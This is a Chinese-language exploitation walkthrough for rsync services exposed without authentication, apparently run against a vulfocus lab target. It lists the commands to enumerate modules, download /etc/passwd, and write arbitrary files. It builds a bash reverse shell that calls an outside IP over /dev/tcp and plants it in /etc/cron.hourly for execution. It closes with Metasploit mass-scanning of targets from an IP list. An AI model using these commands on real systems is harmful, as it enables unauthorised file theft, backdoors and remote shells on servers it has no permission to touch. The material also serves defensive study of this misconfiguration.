未授权访问
漏洞简介
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
漏洞成因
由于用户配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。
漏洞危害
1、造成了严重的信息泄露
2、上传脚本后门文件,远程命令执行
漏洞利用
vulfocus环境下的靶场
rsync 工具 kail中自带
1、nmap扫描目标系统是否开放rsync服务
2、如果存在rsync服务,则利用rsync进行下载和上传。
访问目录
rsync rsync://123.58.236.76:21733/
rsync rsync://124.70.71.251:41376/
显示目录为
src src path
读取文件
rsync rsync://123.58.236.76:21733/src/
下载任意文件
rsync rsync://123.58.236.76:21733/src/etc/passwd ./
rsync rsync://目标地址:873/目标文件 保存路径
任意文件写入
rsync -av 1.txt rsync://123.58.236.76:45264/src/
rsync -av 本地文件路径 rsync://目标地址:873/保存路径
反弹shell
1、获取信息
rsync rsync://123.58.236.76:45264/src/etc/crontab
/etc/crontab
crontab配置文件作用:限制哪些用户可以使用crontab命令;
2、创建文件
touch shell
#!/bin/bash
/bin/bash -i >& /dev/tcp/49.235.76.210/3306 0>&1
chmod +x shell
3、上传文件
rsync -av shell rsync://123.58.236.76:45264/src/etc/cron.hourly
4、监听端口后等待接受反弹
配合工具:https://github.com/wgpsec/fofa_viewer
#msf批量检测
msfconsole
use auxiliary/scanner/rsync/modules_list
set rhosts file:/root/ips.txt
set threads 10
run